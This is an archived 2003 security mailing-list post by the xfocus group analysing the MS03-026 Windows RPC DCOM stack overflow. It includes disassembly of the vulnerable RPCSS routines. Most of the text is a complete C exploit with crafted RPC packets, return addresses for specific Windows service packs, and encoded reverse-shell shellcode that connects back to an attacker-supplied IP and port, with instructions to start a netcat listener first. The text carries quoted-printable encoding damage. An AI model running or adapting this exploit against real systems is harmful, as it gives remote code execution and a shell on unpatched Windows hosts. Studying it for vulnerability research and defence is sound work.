bugtraq
The Analysis of LSD's Buffer Overrun in Windows RPC Interface
Author:Flashsky
site:www.xfocus.org WWW.VENUSTECH.COM.CN WWW.SHOPSKY.COM
Email:flashsky@xfocus.org
Translator:benjurry
Email:benjurry@xfocus.org
Foreword
Jul 16th, 2003,LSD published that they had discovered a critical=
security vulnerability in all recent
versions of Microsoft operating systems. The vulnerability=
affects default installations of Windows NT
4.0, Windows 2000, Windows XP as well as Windows 2003 Server.But=
they didn't publish codes or any
technical details.For analysing and exploit the=
vulnerability,Members of Xfocus have researched the
problem and read the code day after night.Through the process,we=
find the "Microsoft Windows 2000 RPC
DCOM Interface DOS AND Privilege Escalation Vulnerability",and=
now we have gotton the reson of
vulnerability found by LSD.We thanks all members of xfocus and=
yuange,EYAS,IPXODI,these guys gave us
much help.And at the same time, we admire LSD for their=
brightness.
Analysis
In fact,MS03-026 fix two vulnerabilities,one is the local stack=
overflow and the other is remote stack
overflow .They both result from the same interface,the improper=
API is following:
HRESULT CoGetInstanceFromFile(
COSERVERINFO * pServerInfo,
CLSID * pclsid,
IUnknown * punkOuter,
DWORD dwClsCtx,
DWORD grfMode,
OLECHAR * szName,
ULONG cmq,
MULTI_QI * rgmqResults
);
The sixth Parameter is szName ,In MSDN it is said: File to=
initialize the object with using
IPersistFile::Load. May not be NULL. This parameter will result=
in buff overflow.
hr =3D
CoGetInstanceFromFile(pServerInfo,NULL,0,CLSCTX_REMOTE_SERVER,STG=
M_READWRITE,L"C:\\123456111111111111111
1111111111.doc",1,&qi);
When the filename is too long ,the windows will produce a local=
buff voerflow,because the
GetPathForServer function of RPCSS only has 0x220 space. however=
the API checks the file in local first
,and we can't create a file which filename is long than 0x220.So=
we can't use this API to expoit, but we
can use fuction of LPC by constructing packet . Here we only=
focus on remote stack overflow:)
After the client transfer the Parameter to the server, the server=
will translate it to format as
following:
L=A1=B0\\servername\c$\1234561111111111111111111111111.doc".
Then the server will get the servername first,But here is wrong,=
the windows Does not check the
parameter,only assigns the stack of 0x20 , 0x20 is MAX length=
of NETBIOS name.Then buff overflow comes
into being.
the key code is list as following:
GetPathForServer=A3=BA
text:761543DA push ebp
text:761543DB mov ebp, esp
text:761543DD sub esp, 20h <-----the length=
is ony 0x20
text:761543E0 mov eax, [ebp+arg_4]
text:761543E3 push ebx
text:761543E4 push esi
text:761543E5 mov esi, [ebp+hMem]
text:761543E8 push edi
text:761543E9 push 5Ch
text:761543EB pop ebx
text:761543EC mov [eax], esi
text:761543EE cmp [esi], bx
text:761543F1 mov edi, esi
text:761543F3 jnz loc_761544BF
text:761543F9 cmp [esi+2], bx
text:761543FD jnz loc_761544BF
text:76154403 lea eax, [ebp+String1]=
<-----------addr to place servername =A3=AConly
have the length of 0X20
text:76154406 push 0
text:76154408 push eax
text:76154409 push esi =
=A1=B4----------------------here is the parameter of
filename
text:7615440A call GetMachineName
=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3 when the=
fuction return ,it will be buffer
overflow.
GetMachineName:
text:7614DB6F mov eax, [ebp+arg_0]
text:7614DB72 mov ecx, [ebp+arg_4]
text:7614DB75 lea edx, [eax+4]
text:7614DB78 mov ax, [eax+4]
text:7614DB7C cmp ax, 5Ch =
=A1=B4-----------------check if it is 0X5C,if
yes,the servername is over
text:7614DB80 jz short loc_7614DB93
text:7614DB82 sub edx, ecx
text:7614DB84
text:7614DB84 loc_7614DB84: ; CODE=
XREF: sub_7614DA19+178=19j
text:7614DB84 mov [ecx], ax =
=A1=B4----------------write the servername to addr,if
longer than 0x20,buff overflow comes into being
text:7614DB87 inc ecx
text:7614DB88 inc ecx
text:7614DB89 mov ax, [ecx+edx]
text:7614DB8D cmp ax, 5Ch
text:7614DB91 jnz short loc_7614DB84
text:7614DB93
Now here we find the problem and can exploit it.The only question=
is that the "\\servername" is named
bye system,but we can construct it ourselves by sending=
malformed messages.
BTW,there can't include "0x5c" in the shellcode because the=
function GetMachineName checks it .
Exploit:
1=A1=A2The exploit uses JMP ESP (FF E4)to jump ,so we should adjuse=
the address to other windows version;
2=A1=A2The shellcode can connect reversed=A3=ACso we should run nc -l -p=
XXX first;
3=A1=A2The length of shellcode must be sizeof(shellcode)16=3D12 ,if not=
please fill with 0x90,or the packet
formatof RPC will be wrong;
4=A1=A2Before the buffer overflow return ,the 2 Parameters after=
return address need to be used ,so we
should these addresses can be written.
5=A1=A2The exploit use JMP ESP,and we can expoit by overlaying SEH.
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>
#pragma comment(lib,"ws2_32")
unsigned char bindstr[]=3D{
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,=
0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,=
0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,=
0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char request1[]=3D{
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04=
,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58=
,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D=
,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00=
,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1=
,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00=
,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD=
,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00=
,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00=
,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00=
,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00=
,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC=
,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00=
,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00=
,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD=
,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00=
,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00=
,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00=
,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00=
,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00=
,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00=
,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00=
,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00=
,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00=
,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00=
,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88=
,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00=
,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00=
,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00=
,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00=
,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00=
,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66=
,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00=
,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00=
,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06=
,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE=
,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC=
,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00=
,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00=
,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00=
,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00=
,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00=
,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17=
,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00=
,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00=
,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC=
,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D=
,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00=
,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00=
,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC=
,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00=
,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC=
,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00=
,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};
unsigned char request2[]=3D{
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};
unsigned char request3[]=3D{
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34=
,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31=
,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31=
,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
unsigned int jmpesp_cn_sp3 =3D "\x29\x2c\xe2\x77";
unsigned int jmpesp_cn_sp4 =3D "\x29\x4c\xdf\x77";
unsigned int jmpesp_en_xp_sp1=3D"\xdb\x37\xd7\x77";
unsigned char sc[]=3D
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
=
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x0=
0"
"\x46\x00\x58\x00\x46\x00\x58\x00"
"\x29\x4c\xdf\x77" //sp4
//"\x29\x2c\xe2\x77"//0x77e22c29
"\x38\x6e\x16\x76\x0d\x6e\x16\x76" //=D0=E8=D2=AA=CA=C7=BF=C9=D0=B4=B5=C4=C4=DA=B4=E6=B5=D8=D6=B7
=
//=CF=C2=C3=E6=CA=C7SHELLCODE=A3=AC=BF=C9=D2=D4=B7=C5=D7=D4=BC=BA=B5=C4SHELLCODE=A3=AC=B5=AB=B1=D8=D0=EB=B1=A3=D6=A4sc=B5=C4=D5=FB=CC=E5=B3=A4=B6=C8=
/16=3D12=A3=AC=B2=BB=C2=FA=D7=E3=D7=D4=BC=BA=CC=EE=B3=E4=D2=BB=D0=A90X90=B0=C9
//SHELLCODE=B2=BB=B4=E6=D4=DA0X00=A3=AC0X00=D3=EB0X5C
=
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x0=
1"
=
"\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x3=
0"
"\x93\x40\xe2\xfa"
// code
=
"\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe=
1"
=
"\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd=
2"
=
"\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x9=
3"
=
"\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe=
7"
=
"\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc=
0"
=
"\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf=
8"
=
"\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x9=
3"
=
"\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x9=
3"
=
"\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe=
0"
=
"\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x8=
7"
=
"\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x6=
0"
=
"\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc=
5"
=
"\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x9=
0"
=
"\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x2=
2"
=
"\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x1=
8"
=
"\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x9=
2"
=
"\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc=
3"
=
"\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x9=
3"
=
"\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf=
9"
=
"\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x1=
8"
=
"\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xc=
e"
=
"\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc=
6"
=
"\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd=
7"
=
"\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc=
4"
=
"\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xc=
a"
"\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
unsigned char request4[]=3D{
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D=
,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00=
,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00=
,0x00
};
void main(int argc,char ** argv)
{
WSADATA WSAData;
SOCKET sock;
int len,len1;
SOCKADDR_IN addr_in;
short port=3D135;
unsigned char buf1[0x1000];
unsigned char buf2[0x1000];
unsigned short port1;
DWORD cb;
printf("RPC DCOM overflow Vulnerability discoveried by=
LSD\n");
printf("Code by FlashSky,Flashsky xfocus org,benjurry,benjurry=
xfocus org\n");
printf("Welcome to our English Site: http://www.xfocus.org\n");
printf("Welcome to our Chinese Site: http://www.xfocus.net\n");
if(argc<5)
{
printf("useage:%s targetip localIP LocalPort=
SPVersion\n",argv[0]);
printf("SPVersion:\n0 w2k Chinese version +sp3\n 1 w2k Chinese=
version +SP4\n 2 winxp English version +sp1\n");
exit(1);
}
if(atoi(argv[4])=3D=3D0)
memcpy(sc+36,jmpesp_cn_sp3,sizeof(jmpesp_cn_sp3));
else if (atoi(argv[4])=3D=3D1)
memcpy(sc+36,jmpesp_cn_sp4,sizeof(jmpesp_cn_sp4));
else if (atoi(argv[4])=3D=3D2)
memcpy(sc+36,jmpesp_en_xp_sp1,sizeof(jmpesp_en_xp_sp1));
if (WSAStartup(MAKEWORD(2,0),&WSAData)!=3D0)
{
printf("WSAStartup error.Error:%d\n",WSAGetLastError());
return;
}
addr_in.sin_family=3DAF_INET;
addr_in.sin_port=3Dhtons(port);
addr_in.sin_addr.S_un.S_addr=3Dinet_addr(argv[1]);
if=
((sock=3Dsocket(AF_INET,SOCK_STREAM,IPPROTO_TCP))=3D=3DINVALID_SOCKET)=
{
printf("Socket failed.Error:%d\n",WSAGetLastError());
return;
}
if(WSAConnect(sock,(struct sockaddr=
*)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)=3D=3DSOCKET_ERROR)
{
printf("Connect failed.Error:%d",WSAGetLastError());
return;
}
port1 =3D htons(atoi(argv[3])); //=B7=B4=CF=F2=C1=AC=BD=D3=B5=C4=B6=CB=BF=DA
port1 ^=3D 0x9393;
cb=3Dinet_addr(argv[2]);//=B7=B4=CF=F2=C1=AC=BD=D3=B5=C4IP
cb ^=3D 0x93939393;
*(unsigned short *)&sc[330+0x30] =3D port1;
*(unsigned int *)&sc[335+0x30] =3D cb;
len=3Dsizeof(sc);
memcpy(buf2,request1,sizeof(request1));
len1=3Dsizeof(request1);
*(DWORD *)(request2)=3D*(DWORD *)(request2)+sizeof(sc)/2; =
//=BC=C6=CB=E3=CE=C4=BC=FE=C3=FB=CB=AB=D7=D6=BD=DA=B3=A4=B6=C8
*(DWORD *)(request2+8)=3D*(DWORD=
*)(request2+8)+sizeof(sc)/2;//=BC=C6=CB=E3=CE=C4=BC=FE=C3=FB=CB=AB=D7=D6=BD=DA=B3=A4=B6=C8
memcpy(buf2+len1,request2,sizeof(request2));
len1=3Dlen1+sizeof(request2);
memcpy(buf2+len1,sc,sizeof(sc));
len1=3Dlen1+sizeof(sc);
memcpy(buf2+len1,request3,sizeof(request3));
len1=3Dlen1+sizeof(request3);
memcpy(buf2+len1,request4,sizeof(request4));
len1=3Dlen1+sizeof(request4);
*(DWORD *)(buf2+8)=3D*(DWORD *)(buf2+8)+sizeof(sc)-0xc;
//=BC=C6=CB=E3=B8=F7=D6=D6=BD=E1=B9=B9=B5=C4=B3=A4=B6=C8
*(DWORD *)(buf2+0x10)=3D*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc; =
*(DWORD *)(buf2+0x80)=3D*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0x84)=3D*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xb4)=3D*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xb8)=3D*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xd0)=3D*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0x18c)=3D*(DWORD=
*)(buf2+0x18c)+sizeof(sc)-0xc;
if (send(sock,bindstr,sizeof(bindstr),0)=3D=3DSOCKET_ERROR)
{
printf("Send failed.Error:%d\n",WSAGetLastError());
return;
}
len=3Drecv(sock,buf1,1000,NULL);
if (send(sock,buf2,len1,0)=3D=3DSOCKET_ERROR)
{
printf("Send failed.Error:%d\n",WSAGetLastError());
return;
}
len=3Drecv(sock,buf1,1024,NULL);
}
About XFOCUS.ORG
Xfocus is a non-profit and free technology organization which=
was founded in 1998 in China. We are
devoting to research and demonstration of weaknesses related to=
network services and communication
security.
We hope that we can use new technical tools to achieve our goal,=
and to broaden our outlook. We also
hope we can communicate and help with each other through this=
amazing Internet.
From the Internet. For the Internet. Have fun!
---
=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=D6=C2
=C0=F1=A3=A1
=09=09=09=09
=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1xundi
=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1xundi@xfocus.org
=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A12003-07-25
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
